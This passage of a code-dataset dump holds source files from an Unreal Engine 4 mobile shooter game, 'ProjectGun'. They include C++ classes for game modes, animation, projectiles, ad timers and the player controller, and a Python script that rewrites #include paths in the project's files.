79, "num_lines": 47, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_CommandRestartStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n#include \"Game/Console/Commands/PG_CommandRestartStage.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n\nPG_CommandRestartStage::PG_CommandRestartStage()\n{\n}\n\nPG_CommandRestartStage::~PG_CommandRestartStage()\n{\n}\n\nvoid PG_CommandRestartStage::UpdateCommand()\n{\n\tif (bOnCommand)\n\t{\n\t\tbOnCommand = false;\n\t\tExcute();\n\t}\n}\n\nvoid PG_CommandRestartStage::Excute()\n{\n\tABCHECK(nullptr != G_PGWorld);\n\tABCHECK(nullptr != m_pConsoleVariable);\n\n\tif (1 != m_pConsoleVariable->GetInt())\n\t{\n\t\tABLOG(Warning, TEXT(\"To use this command, enter a value of 
1.\"));\n\t\treturn;\n\t}\n\n\tauto pGameMdoe = Cast<APG_GameModeStage>(G_PGWorld->GetAuthGameMode());\n\tif (nullptr == pGameMdoe)\n\t{\n\t\tABLOG(Warning, TEXT(\"Can only be used in stage play.\"));\n\t\treturn;\n\t}\n\n\tpGameMdoe->RestartGame();\n}\n\nvoid PG_CommandRestartStage::OnChangeCommand()\n{\n\tABCHECK(nullptr != m_pConsoleVariable);\n\tbOnCommand = true;\n}" }, { "alpha_fraction": 0.6726045608520508, "alphanum_fraction": 0.6761672496795654, "avg_line_length": 32.12422180175781, "blob_id": "a1d034edd728e5c69bf3f146022d8a757064b9d8", "content_id": "db75919d37741ad3332fd82248d3eca4467768a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5333, "license_type": "no_license", "max_line_length": 131, "num_lines": 161, "path": "/fixup-include-paths.py", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport os, sys\nimport re\n\nproject_path = \"C:/Project_Gun\"\nengine_path = \"C:/Program Files/Epic Games/UE_4.25/Engine\"\n\nresponse = input(\"\"\"This script will analyze all project source files (includng plugins), searching for #include directives to fix:\n - old one-file #include paths will be replaced by long paths, as requested by the 4.24 new default build settings\n - include style for engine includes (<,>) and project includes (\\\",\\\") will be enforced\n\nThe paths used for the analysis are:\n Engine: \"\"\" + engine_path + \"\"\"\n Project: \"\"\" + project_path + \"\"\"\n\nIf you want to change these paths, edit the source code of this script.\n\nStart with the analysis? (y/n)\"\"\")\n\nif(response != \"y\") : exit(0)\n\ndef ExtractIncludePaths(basepath, localpath=\"\", computed_map={}, excluded_folders=[]):\t\n\tdirs = os.listdir( basepath + \"/\" + localpath)\n\tfor file in dirs:\n\t\tcurrlocalpath = localpath + \"/\" + file\n\t\tcurrpath = basepath + \"/\" + currlocalpath\n\t\t\n\t\tif(os.path.isdir(currpath)) : \n\t\t\tif(not (\"\" + file) in excluded_folders) : ExtractIncludePaths(basepath, currlocalpath, computed_map, excluded_folders)\n\t\telse:\n\t\t\t(name, ext) = os.path.splitext(file)\n\t\t\t\n\t\t\tif(ext==\".h\"):\n\t\t\t\tcomputed_map[file] = currlocalpath\t\t\t\t\n\n\treturn computed_map\n\ndef PrintIncludePaths(include_paths):\n\tfor key in include_paths:\n\t\tprint(key + \" -> \" + include_paths[key])\n\ndef MinimizePath(path):\n\tif(path.startswith('/')): path = path[1:] # strip first slash\n\t\n\tsearches = [\"Public\", \"Private\", \"Classes\", \"Source\"]\n\n\tbackup = path\n\tfor search in searches:\n\t\tpath = backup.split(\"/\")\n\t\tfound = False\n\t\twhile True: # removing all path folders until Public/ (included)\n\t\t\ttmp = path[0]\n\t\t\tpath.remove(tmp)\n\n\t\t\tif(tmp == search): \n\t\t\t\tfound = True\n\t\t\t\tbreak\n\n\t\t\tif(len(path) == 0) : break\n\n\t\tif(found) : break\n\n\treturn \"/\".join(path) if len(path) > 0 else backup\n\ndef FixInclude(include, source_local_path, project_includes = {}, engine_includes={}, engine_plugins_includes={}):\n\tinclude_path = \"\"\n\n\tx = re.search(\"\\\"(.+)\\\"\", include)\n\tif(not x is None):\n\t\tinclude_path = x.groups()[0]\n\telse:\n\t\tx = re.search(\"<(.+)>\", include)\n\t\tif(not x is None):\n\t\t\tinclude_path = x.groups()[0]\n\n\tif(include_path == \"\") : return include\n\n\t# take the last part of the include path\n\ttmp = include_path.split(\"/\")\n\tinclude_filename = tmp[len(tmp)-1]\n\n\tcomplete_path = \"\"\n\tinclude_style = ['\"', '\"']\n\n\tif(include_filename in 
project_includes): # project\n\t\tcomplete_path = project_includes[include_filename]\n\telif(include_filename in engine_includes): # engine\n\t\tcomplete_path = engine_includes[include_filename]\n\t\tinclude_style = ['<', '>']\n\telif(include_filename in engine_plugins_includes): #engine plugins\n\t\tcomplete_path = engine_plugins_includes[include_filename]\n\t\tinclude_style = ['<', '>']\n\n\tif(complete_path != \"\"):\n\t\tif(complete_path.find(include_path) != -1):\n\t\t\treturn '#include ' + include_style[0] + MinimizePath(complete_path) + include_style[1] + '\\n'\n\t\n\treturn include\n\ndef FixFile(basepath, localpath, filename, project_includes = {}, engine_includes={}, engine_plugins_includes={}):\n\tprint(\"Fixing: \" + basepath + \"/\" + localpath + \"...\")\n\n\tfixed_content = \"\"\n\n\twith open(basepath + \"/\" + localpath, \"r\") as f:\n\t\tlines = f.readlines()\n\n\t\tfor line in lines:\n\t\t\tx = re.search(\"^\\s*#include \", line)\n\n\t\t\tif(not x is None) :\n\t\t\t\tfixed_content = fixed_content + FixInclude(line, localpath, project_includes, engine_includes, engine_plugins_includes)\n\t\t\telse:\n\t\t\t\tfixed_content = fixed_content + line\n\n\tf = open(basepath + \"/\" + localpath, \"w\")\n\tf.write(fixed_content)\n\tf.close()\n\n\t#exit(0)\n\ndef FixFiles(basepath, localpath=\"\", project_includes = {}, engine_includes={}, engine_plugins_includes={}):\n\tdirs = os.listdir( basepath + \"/\" + localpath)\n\tfor file in dirs:\n\t\tcurrlocalpath = localpath + \"/\" + file if localpath != \"\" else file\n\t\tcurrpath = basepath + \"/\" + currlocalpath\n\t\t\n\t\tif(os.path.isdir(currpath)) : \t\t\t\n\t\t\tFixFiles(basepath, currlocalpath, project_includes, engine_includes, engine_plugins_includes)\n\t\telse:\n\t\t\t(name, ext) = os.path.splitext(file)\n\t\t\t\n\t\t\tif((ext==\".h\" or ext==\".cpp\") and file != \"RzChromaSDKTypes.h\"): #avoid RzChromaSDKTypes.h cause it contains non utf8 characters\n\t\t\t\tFixFile(basepath, currlocalpath, file, project_includes, engine_includes, engine_plugins_includes)\n\nproject_include_paths = {}\nExtractIncludePaths(project_path + \"/Source\", \"\", project_include_paths)\n\nengine_include_paths = {}\nExtractIncludePaths(engine_path + \"/Source\", \"\", engine_include_paths, [\"ThirdParty\", \"Private\"])\n\nengine_plugins_include_paths = {}\nExtractIncludePaths(engine_path + \"/Plugins\", \"\", engine_plugins_include_paths, [\"ThirdParty\", \"Private\"]) \n\nFixFiles(project_path + \"/Source\", \"\", project_include_paths, engine_include_paths, engine_plugins_include_paths)\n\ndirs = os.listdir( project_path + \"/Plugins\")\nfor file in dirs:\n\tprint(file)\n\t\n\tsrc_path = project_path + \"/Plugins/\" + file + \"/Source\"\n\n\tif(os.path.isdir(src_path)) :\n\t\tplugin_include_paths = {}\n\t\tExtractIncludePaths(src_path, \"\", plugin_include_paths)\n\n\t\tFixFiles(src_path, \"\", plugin_include_paths, engine_include_paths, engine_plugins_include_paths)\n\telse:\n\t\tprint(project_path + \"/Plugins/\" + file + \" is not a directory or doesn't contain any /Source subfolder, skipping\" +\n\t\t\t\" (if it's not a binary plugin folder maybe you don't need it anymore?)\")\n" }, { "alpha_fraction": 0.5674778819084167, "alphanum_fraction": 0.5719026327133179, "avg_line_length": 25.58823585510254, "blob_id": "4008d6fcedd9081e79015011f15dbeda2fd44b5d", "content_id": "d3a8a0f350b6ea9bd73dbcce84c648887c089419", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 956, "license_type": 
"no_license", "max_line_length": 109, "num_lines": 34, "path": "/Source/Project_Gun/Public/Game/GameMode/PG_GameModeMainLobby.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n#include <GameFramework/GameModeBase.h>\n#include \"PG_GameModeMainLobby.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_GameModeMainLobby : public APG_GameModeBase\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_GameModeMainLobby();\n\n\tvirtual void BeginPlay() override;\n\t\npublic :\n\t//===================================================\n\t// Mission\n\t//===================================================\n\tvirtual bool IsClearMission(enum EStageClearType a_ekStageClearType) override;\t// MainLobby에서 사용하는 미션 클리어 검사\n\n\t//===================================================\n\t// WeaponSlot\n\t//===================================================\n\tvoid SaveWeaponEquipSlot(int32 nSlotIndex, int32 nWeaponIndex);\t\t// 무기를 장착 정보를 저장한다.\n};\n" }, { "alpha_fraction": 0.5755265355110168, "alphanum_fraction": 0.5766158103942871, "avg_line_length": 48.17856979370117, "blob_id": "b2c2d3414471e3240e550da22845f9e2a4ce9de4", "content_id": "4cf95ed9dd590d30060f660fa88ccea67e512558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2872, "license_type": "no_license", "max_line_length": 154, "num_lines": 56, "path": "/Source/Project_Gun/Project_Gun.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n#include <Engine.h>\n#include <Kismet/KismetMathLibrary.h>\n\n#define TEST_CODE\n\nDECLARE_LOG_CATEGORY_EXTERN(Project_Gun, Log, All);\n#define ABLOG_CALLINFO\t\t\t\t\t(FString(__FUNCTION__) + TEXT(\"(\") + FString::FromInt(__LINE__) + TEXT(\")\"))\n#define ABLOG_S(Verbosity)\t\t\t\tUE_LOG(Project_Gun, Verbosity, TEXT(\"%s\"), *ABLOG_CALLINFO)\n#define ABLOG(Verbosity, Format, ...)\tUE_LOG(Project_Gun, Verbosity, TEXT(\"%s %s\"), *ABLOG_CALLINFO, *FString::Printf(Format, ##__VA_ARGS__))\n\n#define ABCHECK(Expr, ...)\t\t\t\t{ if(!(Expr)) { ABLOG(Error, TEXT(\"ASSERTION : %s\"), TEXT(\"'\"#Expr\"'\")); return __VA_ARGS__; }}\n\n//#define SAFE_DESTROY(pUObject)\t\\\n//{ \\\n//\tUObject* pObjectDestroy = Cast<UObject>(pUObject);\t\\\n//\tif (pObjectDestroy && pObjectDestroy->IsValidLowLevel()) \\\n//\t{\t\\\n//\t\tpObjectDestroy->ConditionalBeginDestroy();\t\t\\\n//\t\tpObjectDestroy = nullptr;\t\t\t\t\t\t\\\n//\t}\t\\\n//\telse \\\n//\t{ \\\n//\t\tABLOG(Error, TEXT(\"UObject Safe Destroy failed\"));\\\n//\t} \\\n//} \\\n\n//==============================================================================================================================\n// Widget Macros\n//==============================================================================================================================\n// 위젯 선언 (Widget 관련 class 내 위젯 선언시 사용합니다.)\n#define PG_WIDGET_DECLAR(WIDGET_TYPE, WIDGET_NAME, ...)\t\t\tUPROPERTY(##__VA_ARGS__) class WIDGET_TYPE* m_pk##WIDGET_NAME = nullptr\n#define PG_WIDGET_DECLAR_TArray(WIDGET_TYPE, WIDGET_NAME, ...)\tUPROPERTY(##__VA_ARGS__) TArray<class WIDGET_TYPE*> m_pk##WIDGET_NAME\n\n// 위젯 연결 (PG_WIDGET_DECLAR으로 선언한 Widget과 연결하기 위해 NativeConstruct 함수에서 사용합니다.)\n#define PG_WIDGET_LINK(WIDGET_TYPE, 
WIDGET_NAME) \\\n\tm_pk##WIDGET_NAME = Cast<WIDGET_TYPE>(GetWidgetFromName(TEXT(#WIDGET_NAME))); \\\n\tif (nullptr == m_pk##WIDGET_NAME) { ABLOG(Error, TEXT(\"\\\"<\"#WIDGET_TYPE\"> \"#WIDGET_NAME \"\\\" Unable to connect to the widget.\")); }\t\\\n\n// TArray 타입으로 선언된 변수에 Widget에 연결합니다.\n#define PG_WIDGET_LINK_TArray(WIDGET_TYPE, WIDGET_NAME, MAX_SIZE) \\\n\tm_pk##WIDGET_NAME.Init(nullptr, MAX_SIZE);\t\\\n\tfor (int32 nIndex = 0; nIndex < MAX_SIZE; ++nIndex) { \\\n\t\tFString GetWidgetName = FString::Printf(TEXT(#WIDGET_NAME\"_%d\"), nIndex); \\\n\t\tm_pk##WIDGET_NAME[nIndex] = Cast<WIDGET_TYPE>(GetWidgetFromName(*GetWidgetName)); \\\n\t\tif (nullptr == m_pk##WIDGET_NAME[nIndex]) { ABLOG(Error, TEXT(\"\\\"<\"#WIDGET_TYPE\"> %s Unable to connect to the widget.\"), *GetWidgetName); continue; }\t\\\n\t} \\\n\n// End Widget Macros\n//==============================================================================================================================\n\n#include \"Define/PG_DefineDelegate.h\"\n#include \"Define/PG_TableData.h\"\n#include \"Define/PG_GamePlayData.h\"\n" }, { "alpha_fraction": 0.7509986758232117, "alphanum_fraction": 0.7616511583328247, "avg_line_length": 22.5, "blob_id": "f496b48e251b9edfd100f9a9efdfc5bb16974a44", "content_id": "e7d257be9e070764bd63567a995e71a73ff402a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 761, "license_type": "no_license", "max_line_length": 134, "num_lines": 32, "path": "/Source/Project_Gun/Private/SaveData/PG_SavePlayerData.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"SaveData/PG_SavePlayerData.h\"\n\n\n\nUPG_SavePlayerData::UPG_SavePlayerData()\n{\n\tm_nLastPlayStageID = 0;\n\tm_nRewardPoint = 0;\n\tm_bExtendWeaponSlot = false;\n\t//m_nEquipWeaponSlotIndex = 0;\n\t//m_kEquipWeaponClass = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_Rifle.BP_Weapon_Rifle_C'\"));\n\n\tm_kEquipWeaponTableIndex.Init(0, PG_MAX_WEAPON_SLOT);\n\n\t// 기본 무기 Unlock\n\tFPGWeaponOwnData kDefalutWeaponOwnData;\n\tkDefalutWeaponOwnData.IsUnlock = true;\n\tWeaponOwnData.Add(0, kDefalutWeaponOwnData);\n}\n\n\nFString UPG_SavePlayerData::GetSlotName()\n{\n\treturn TEXT(\"PlayerSaveData\");\n}\n\nint32 UPG_SavePlayerData::GetPlayerIndex()\n{\n\treturn 0;\n}" }, { "alpha_fraction": 0.7355555295944214, "alphanum_fraction": 0.7450000047683716, "avg_line_length": 22.363636016845703, "blob_id": "2f3e02d2b10aea48ad5fe9c7d0b9f291228f7653", "content_id": "3323f499a4098413f98e56e92a5898b4834abc45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1802, "license_type": "no_license", "max_line_length": 95, "num_lines": 77, "path": "/Source/Project_Gun/Private/Anim/PG_AnimIns_MyChar.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Anim/PG_AnimIns_MyChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include <DrawDebugHelpers.h>\n\nUPG_AnimIns_MyChar::UPG_AnimIns_MyChar()\n{\n\tCurrentPawnSpeed = 0.0f;\n\tCurrentPawnSpeedRatio = 0.0f;\n\tfAimYaw = 0.0f;\n\tfAimPitch = 0.0f;\n\tTargetMonster = nullptr;\n}\n\nvoid UPG_AnimIns_MyChar::NativeUpdateAnimation(float DeletaSeconds)\n{\n\tSuper::NativeUpdateAnimation(DeletaSeconds);\n\n\tauto Pawn = 
Cast<APG_MyChar>(TryGetPawnOwner());\n\tif (Pawn)\n\t{\n\t\tCurrentPawnSpeed = Pawn->GetVelocity().Size();\n\n\t\tif (CurrentPawnSpeed > 0.0f)\n\t\t\tCurrentPawnSpeedRatio = CurrentPawnSpeed / Pawn->GetMaxSpeed();\n\t\telse\n\t\t\tCurrentPawnSpeedRatio = 0.0f;\n\t}\n}\n\nvoid UPG_AnimIns_MyChar::SetRotation(float fYaw)\n{\n\tfAimYaw = fYaw;\n\tfAimPitch = fYaw;\n}\n\nvoid UPG_AnimIns_MyChar::SetMontageFireReaction(UAnimMontage* AnimMontage)\n{\n\tABCHECK(nullptr != AnimMontage);\n\tMontageFireReaction = AnimMontage;\n}\n\nbool UPG_AnimIns_MyChar::IsVaildTargetMonster()\n{\n\treturn TargetMonster ? true : false;\n}\n\nbool UPG_AnimIns_MyChar::IsAimingComplete()\n{\n\tABCHECK(nullptr != MontageFireReaction, false);\n\n\tFAnimMontageInstance* pAnimMontageInstance = GetActiveInstanceForMontage(MontageFireReaction);\n\tif (pAnimMontageInstance && pAnimMontageInstance->bPlaying)\n\t{\n\t\tfloat fBlendTime = pAnimMontageInstance->GetWeight();\n\t\t//FString DebugMsg = FString::Printf(TEXT(\"BlendTime : %f\"), fBlendTime);\n\t\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, DebugMsg);\n\n\t\treturn (0.9f <= fBlendTime);\n\t}\n\n\treturn false;\n}\n\nvoid UPG_AnimIns_MyChar::OnTargetMonster(APG_MonChar* pTarget)\n{\n\tTargetMonster = pTarget;\n}\n\nvoid UPG_AnimIns_MyChar::AnimNotify_Fire()\n{\n\t//ABLOG(Warning, TEXT(\"Fire!\"));\n\tOnFire.Broadcast();\n}\n\n" }, { "alpha_fraction": 0.7936046719551086, "alphanum_fraction": 0.7965116500854492, "avg_line_length": 31.761905670166016, "blob_id": "b107be44258236b7b1677cc374dc54d869328743", "content_id": "e4e24c3c654eb9c70583fdf1cc728c6c16d5872e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1402, "license_type": "no_license", "max_line_length": 202, "num_lines": 42, "path": "/Source/Project_Gun/Public/BlueScriptObject/Projectile/PG_ProjectileFlame.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n#include \"PG_ProjectileFlame.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_ProjectileFlame : public APG_Projectile\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_ProjectileFlame();\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\t// Called when the game starts or when spawned\n\tvirtual void Tick(float DeltaTime) override;\t// Called every frame\n\npublic:\n\tvirtual void FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon = false) override;\n\n\tvoid SetScaleTime(float fScaleTime);\n\nprivate :\n\tvoid UpdateCollisionScale(float DeltaTime);\n\nprotected:\n\tvirtual void OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult) override;\n\tvirtual void OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent) override;\n\nprivate:\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUStaticMeshComponent*\tCollisionMeshComponent;\t// 화염 방사시 충돌 체크를 위한 Static Mesh\n\n\tfloat m_fScaleTime = 0.0f;\n};\n" }, { "alpha_fraction": 0.7093712687492371, "alphanum_fraction": 0.7224199175834656, "avg_line_length": 25.35416603088379, "blob_id": 
"c717dfccd9ab3c3dd63eae51d09e1f2d950c8861", "content_id": "f429b2667afe681f3fce6f3a8dbe1153d08b407e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2531, "license_type": "no_license", "max_line_length": 106, "num_lines": 96, "path": "/Source/Project_Gun/Private/Game/AD/PG_ADData.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"Game/AD/PG_ADData.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n\nPG_ADData::PG_ADData()\n{\n}\n\nPG_ADData::~PG_ADData()\n{\n}\n\nvoid PG_ADData::Init(UPG_GameInstance* pGameInstance)\n{\n\tABCHECK(nullptr != pGameInstance);\n\tm_kRemainReViewableTime.Init(0.0f, (int32)EADType::eAT_Max);\n\n\tfor (int32 nIndex = 0; nIndex < m_kRemainReViewableTime.Num(); ++nIndex)\n\t{\n\t\tauto pADTableData = pGameInstance->GetADTableData((EADType)nIndex);\n\t\tif (nullptr == pADTableData)\n\t\t{\n\t\t\tABLOG(Warning, TEXT(\"Can't Find ADTable Data [Index : %d]\"), nIndex);\n\t\t\tcontinue;\n\t\t}\n\n\t\tm_kRemainReViewableTime[nIndex] = (float)pADTableData->ReViewableTime;\n\t}\n}\n\nvoid PG_ADData::Update(float DeltaTime)\n{\n\tABCHECK(nullptr != G_PGWorld);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(G_PGWorld->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tfor (int32 nIndex = 0; nIndex < m_kRemainReViewableTime.Num(); ++nIndex)\n\t{\n\t\tauto pADTableData = pGameInstance->GetADTableData((EADType)nIndex);\n\t\tif (nullptr == pADTableData)\n\t\t\tcontinue;\n\n\t\tif (0.0f < m_kRemainReViewableTime[nIndex])\n\t\t{\n\t\t\t// MainLobby\n\t\t\tif (pADTableData->TimeDeduction_MainLobby && Cast<APG_GameModeMainLobby>(G_PGWorld->GetAuthGameMode()))\n\t\t\t{\n\t\t\t\tm_kRemainReViewableTime[nIndex] -= DeltaTime;\n\t\t\t\tif (0.0f > m_kRemainReViewableTime[nIndex])\n\t\t\t\t\tm_kRemainReViewableTime[nIndex] = 0.0f;\n\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t\t// GameModeStage\n\t\t\tif (pADTableData->TimeDeduction_StagePlay && Cast<APG_GameModeStage>(G_PGWorld->GetAuthGameMode()))\n\t\t\t{\n\t\t\t\tm_kRemainReViewableTime[nIndex] -= DeltaTime;\n\t\t\t\tif (0.0f > m_kRemainReViewableTime[nIndex])\n\t\t\t\t\tm_kRemainReViewableTime[nIndex] = 0.0f;\n\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t}\n\t}\n}\n\nvoid PG_ADData::Reset(EADType ekADType)\n{\n\tABCHECK(nullptr != G_PGWorld);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(G_PGWorld->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pADTableData = pGameInstance->GetADTableData(ekADType);\n\tABCHECK(nullptr != pADTableData);\n\n\tm_kRemainReViewableTime[(int32)ekADType] = (float)pADTableData->ReViewableTime;\n}\n\nbool PG_ADData::IsAbleViewAD(EADType ekADType)\n{\n\tABCHECK(ekADType < EADType::eAT_Max, false);\n\treturn (0.0f >= m_kRemainReViewableTime[(int32)ekADType]);\n}\n\nint32 PG_ADData::GetRemainReViewableTime(EADType ekADType)\n{\n\tABCHECK(ekADType < EADType::eAT_Max, 0);\n\treturn (int32)m_kRemainReViewableTime[(int32)ekADType];\n}" }, { "alpha_fraction": 0.7871659994125366, "alphanum_fraction": 0.7875423431396484, "avg_line_length": 33.07051467895508, "blob_id": "e29655b5a249ef003ccbdce4f53a294e43a9e625", "content_id": "378cc7cdf7fc32639b90cecc4d824164fb401acf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5374, "license_type": "no_license", 
"max_line_length": 242, "num_lines": 156, "path": "/Source/Project_Gun/Private/Player/PlayerController/PG_PlayerController.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Player/PlayerController/PG_PlayerController.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"UI/PG_UserWidgetScreenPlayStage.h\"\n#include \"UI/PG_UserWidgetScreenStageFailed.h\"\n#include \"UI/PG_UserWidgetScreenStageClear.h\"\n#include \"UI/PG_VirtualJoystick.h\"\n\n#include <GameFramework/TouchInterface.h>\n#include <GameFramework/InputSettings.h>\n#include <Widgets/Input/SVirtualJoystick.h>\n\nAPG_PlayerController::APG_PlayerController()\n{\n}\n\nvoid APG_PlayerController::CreateTouchInterface()\n{\n\tULocalPlayer* pLocalPlayer = Cast<ULocalPlayer>(Player);\n\n\t// do we want to show virtual joysticks?\n\tif (pLocalPlayer && pLocalPlayer->ViewportClient && SPG_VirtualJoystick::ShouldDisplayTouchInterface())\n\t{\n\t\t// in case we already had one, remove it\n\t\tif (VirtualJoystick.IsValid())\n\t\t{\n\t\t\tCast<ULocalPlayer>(Player)->ViewportClient->RemoveViewportWidgetContent(VirtualJoystick.ToSharedRef());\n\t\t}\n\n\t\tif (CurrentTouchInterface == nullptr)\n\t\t{\n\t\t\t// load what the game wants to show at startup\n\t\t\tFSoftObjectPath DefaultTouchInterfaceName = GetDefault<UInputSettings>()->DefaultTouchInterface;\n\n\t\t\tif (DefaultTouchInterfaceName.IsValid())\n\t\t\t{\n\t\t\t\t// activate this interface if we have it\n\t\t\t\tCurrentTouchInterface = LoadObject<UTouchInterface>(NULL, *DefaultTouchInterfaceName.ToString());\n\t\t\t}\n\t\t}\n\n\t\tif (CurrentTouchInterface)\n\t\t{\n\t\t\t// 재정의한 SPG_VirtualJoystick 조이스틱 사용\n\t\t\tTSharedPtr<SPG_VirtualJoystick> CustomJoystick = SNew(SPG_VirtualJoystick);\n\t\t\tCustomJoystick->BindPlayerController(this);\n\n\t\t\tVirtualJoystick = CustomJoystick;\n\n\t\t\t// add it to the player's viewport\n\t\t\tpLocalPlayer->ViewportClient->AddViewportWidgetContent(CustomJoystick.ToSharedRef());\n\n\t\t\tActivateTouchInterface(CurrentTouchInterface);\n\t\t}\n\t}\n}\n\nvoid APG_PlayerController::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\nvoid APG_PlayerController::OnPossess(APawn* aPawn)\n{\n\tSuper::OnPossess(aPawn);\n}\n\nvoid APG_PlayerController::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\t//UserWidgetPlayStage = CreateWidget<UPG_UserWidgetPlayStage>(this, LoadClass<UPG_UserWidgetPlayStage>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/WB_PlayStage.WB_PlayStage_C'\")));\n\t//ABCHECK(nullptr != UserWidgetPlayStage);\n\tm_pUserWidgetScreenPlayStage = CreateWidget<UPG_UserWidgetScreenPlayStage>(this, LoadClass<UPG_UserWidgetScreenPlayStage>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/Screen/WB_ScreenPlayStage.WB_ScreenPlayStage_C'\")));\n\tABCHECK(nullptr != m_pUserWidgetScreenPlayStage);\n\tm_pWidgetStageClear = CreateWidget<UPG_UserWidgetScreenStageClear>(this, LoadClass<UPG_UserWidgetScreenStageClear>(NULL, TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/Screen/WB_ScreenStageClear.WB_ScreenStageClear_C'\")));\n\tABCHECK(nullptr != m_pWidgetStageClear);\n\tm_pUserWidgetScreenStageFailed = CreateWidget<UPG_UserWidgetScreenStageFailed>(this, LoadClass<UPG_UserWidgetScreenStageFailed>(NULL, 
TEXT(\"WidgetBlueprint'/Game/PG/Blueprints/WidgetBP/Screen/WB_ScreenStageFailed.WB_ScreenStageFailed_C'\")));\n\tABCHECK(nullptr != m_pUserWidgetScreenStageFailed);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (pGameStateStage)\n\t{\n\t\tpGameStateStage->StageClearDelegate.AddUObject(this, &APG_PlayerController::OnStateClear);\n\t\tpGameStateStage->StageFailedDelegate.AddUObject(this, &APG_PlayerController::OnStateFailed);\n\t}\n\n\tm_pUserWidgetScreenPlayStage->AddToViewport();\n\tm_pUserWidgetScreenPlayStage->Init();\n}\n\nvoid APG_PlayerController::SetupInputComponent()\n{\n\tSuper::SetupInputComponent();\n}\n\nvoid APG_PlayerController::SetLockJoystickInput(bool a_bLock)\n{\n\tif (a_bLock)\n\t\tActivateTouchInterface(nullptr);\n\telse\n\t\tCreateTouchInterface();\n}\n\nvoid APG_PlayerController::OnStateClear()\n{\n\tSetLockJoystickInput(true);\n\t//SetPause(true);\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pPlayerState = GetPlayerState<APG_MyPlayerState>();\n\tABCHECK(nullptr != pPlayerState);\n\n\t// 스테이지 클리어 보상 획득\n\tint32 nRewardPoint = pPlayerState->GetOriginalPlayerData()->RewardPoint;\n\tpPlayerState->SetRewardPoint(nRewardPoint + 